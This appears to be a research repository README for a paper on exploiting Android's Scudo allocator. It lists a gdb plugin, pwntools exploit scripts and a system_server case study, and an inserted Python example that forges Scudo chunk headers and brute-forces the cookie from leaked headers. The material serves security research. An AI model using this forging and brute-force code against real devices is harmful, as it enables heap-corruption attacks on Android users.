This repository contains the artifacts of the paper "Exploiting Android's Hardened Memory Allocator".

The gdb-plugin folder contains a gdb plugin that helps with analyzing the scudo heap state. The plugin is designed to be used with gef; to use it, install gef from https://github.com/hugsy/gef. There is also a port for pwndbg at gdb-plugin/scudo-pwndbg.py (thanks to @ju256).
The scudocookie folder contains a python3 library that conveniently computes a chunk's checksum, or brute-forces the cookie given a chunk's address and header.

Installation:

```sh
cd scudocookie && sudo python3 setup.py install
```
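The arithmetic behind such a library, as an added example (this is not the scudocookie library's code or its API): the 64-bit header layout of the Scudo standalone allocator, the checksum Scudo computes over the cookie, the user pointer and the header with its Checksum field zeroed, a forging helper that makes an attacker-chosen header pass Scudo's validity check, and a brute-force over cookie candidates that keeps only those consistent with every leaked (pointer, header) pair. The CRC32C path models the crc32 instructions used when hardware support is available; the BSD rotate-and-add path is the software fallback. The cookie, pointers and header fields in the demo are constructed values, not taken from a device, and the brute-force is run over a small range so it finishes instantly in Python (a full 2^32 sweep is a job for C).

```python
"""Scudo (standalone) chunk-header checksum arithmetic: compute, forge, verify,
brute-force the cookie.  Added example; not the scudocookie library's code.

64-bit header, low bit first (scudo/standalone/chunk.h):
  ClassId:8 | State:2 | OriginOrWasZeroed:2 | SizeOrUnusedBytes:20 | Offset:16 | Checksum:16
Checksum = f(Cookie, user pointer, header with Checksum zeroed), where f is a
CRC32C folded to 16 bits when the crc32 instructions are available (the usual
case on arm64 Android), or a BSD-style rotate-and-add checksum seeded with the
low 16 bits of the cookie otherwise.
"""
from typing import Iterable, List, Tuple

U64 = 0xFFFFFFFFFFFFFFFF
CHECKSUM_SHIFT = 48
CHECKSUM_MASK = 0xFFFF << CHECKSUM_SHIFT
CRC32C_POLY = 0x82F63B78  # reflected Castagnoli polynomial of the crc32c instructions

_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ CRC32C_POLY if _c & 1 else _c >> 1
    _TABLE.append(_c)


def crc32c_update(crc: int, data: bytes) -> int:
    """Raw reflected CRC32C step: no initial or final XOR, like the instructions."""
    for byte in data:
        crc = _TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)
    return crc & 0xFFFFFFFF


def crc32c_u64(crc: int, value: int) -> int:
    """Software twin of __crc32cd / _mm_crc32_u64 (little-endian byte order)."""
    return crc32c_update(crc, (value & U64).to_bytes(8, "little"))


def bsd_checksum_u64(sum16: int, value: int) -> int:
    """Scudo's computeBSDChecksum: rotate right by one, then add the next byte."""
    for byte in (value & U64).to_bytes(8, "little"):
        sum16 = ((sum16 >> 1) | ((sum16 & 1) << 15)) & 0xFFFF
        sum16 = (sum16 + byte) & 0xFFFF
    return sum16


def pack_header(class_id: int, state: int, origin: int, size_or_unused: int,
                offset: int, checksum: int = 0) -> int:
    """Assemble the bit fields into the packed 64-bit header word."""
    return ((class_id & 0xFF) | ((state & 3) << 8) | ((origin & 3) << 10)
            | ((size_or_unused & 0xFFFFF) << 12) | ((offset & 0xFFFF) << 32)
            | ((checksum & 0xFFFF) << CHECKSUM_SHIFT))


def header_checksum(cookie: int, ptr: int, header: int, hw_crc32: bool = True) -> int:
    """16-bit value Scudo stores in the Checksum field of the chunk at user pointer ptr."""
    zeroed = header & ~CHECKSUM_MASK & U64
    if hw_crc32:
        crc = crc32c_u64(cookie & 0xFFFFFFFF, ptr)
        crc = crc32c_u64(crc, zeroed)
        return (crc ^ (crc >> 16)) & 0xFFFF
    # Software fallback: only the low 16 bits of the cookie take part.
    return bsd_checksum_u64(bsd_checksum_u64(cookie & 0xFFFF, ptr), zeroed)


def forge_header(cookie: int, ptr: int, header: int, hw_crc32: bool = True) -> int:
    """Patch the Checksum field so Scudo accepts an otherwise attacker-chosen header."""
    csum = header_checksum(cookie, ptr, header, hw_crc32)
    return (header & ~CHECKSUM_MASK & U64) | (csum << CHECKSUM_SHIFT)


def header_is_valid(cookie: int, ptr: int, header: int, hw_crc32: bool = True) -> bool:
    """The check Scudo performs on every header load."""
    return (header >> CHECKSUM_SHIFT) == header_checksum(cookie, ptr, header, hw_crc32)


def bruteforce_cookie(samples: Iterable[Tuple[int, int]], candidates: Iterable[int],
                      hw_crc32: bool = True) -> List[int]:
    """Every candidate cookie consistent with all leaked (ptr, header) pairs.

    The checksum is 16 bits, so one sample leaves about 2**16 of the 2**32
    cookies in play; two or three leaked headers narrow it down to one.
    """
    samples = list(samples)
    return [c for c in candidates
            if all(header_is_valid(c, p, h, hw_crc32) for p, h in samples)]


# Constructed demo values (not from a real device): a small cookie so the
# brute-force below finishes instantly, three allocated chunks, their headers.
DEMO_COOKIE = 0x1337
DEMO_CHUNKS = [
    (0x7F00_0001_0010, pack_header(class_id=3, state=1, origin=0, size_or_unused=0x20, offset=0)),
    (0x7F00_0001_0050, pack_header(class_id=3, state=1, origin=0, size_or_unused=0x18, offset=0)),
    (0x7F00_0002_0100, pack_header(class_id=7, state=1, origin=1, size_or_unused=0x100, offset=0)),
]
# What an attacker would read out of the heap: pointer plus checksummed header.
DEMO_LEAK = [(p, forge_header(DEMO_COOKIE, p, h)) for p, h in DEMO_CHUNKS]

if __name__ == "__main__":
    for p, h in DEMO_LEAK:
        print(f"ptr={p:#x} header={h:#018x} valid={header_is_valid(DEMO_COOKIE, p, h)}")
    print("cookies consistent with the leak in [0, 0x2000):",
          [hex(c) for c in bruteforce_cookie(DEMO_LEAK, range(0x2000))])
```

Two practical consequences follow from the arithmetic: forging a header requires the cookie and the exact user pointer the chunk will be validated at, since the pointer is part of the checksum input, and a single leaked header is not enough to recover the cookie because the 16-bit checksum leaves roughly 65536 candidate cookies; feed the brute-force several leaked chunks.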
The exploits folder contains a vulnerable heap menu program along with pwntools python3 scripts that showcase our exploitation techniques, forged CommitBase and safe unlink. To run the scripts, install scudocookie first (pwntools is also required).

Forged CommitBase exploit:

```sh
cd exploits && python3 forged_commitbase.py GDB
```

Safe unlink exploit:

```sh
cd exploits && python3 safe_unlink.py GDB
```

Alternatively, use the provided Dockerfile and run the exploits inside the container, which has all dependencies installed:

```sh
cd exploits && ./build_docker.sh && ./run_docker.sh
```
The case-study folder contains the artifacts used in our exploitation case study, in which we backported CVE-2015-1528 and exploited the system server on Android 14. For details on how to run it, check the README.md in the case-study folder.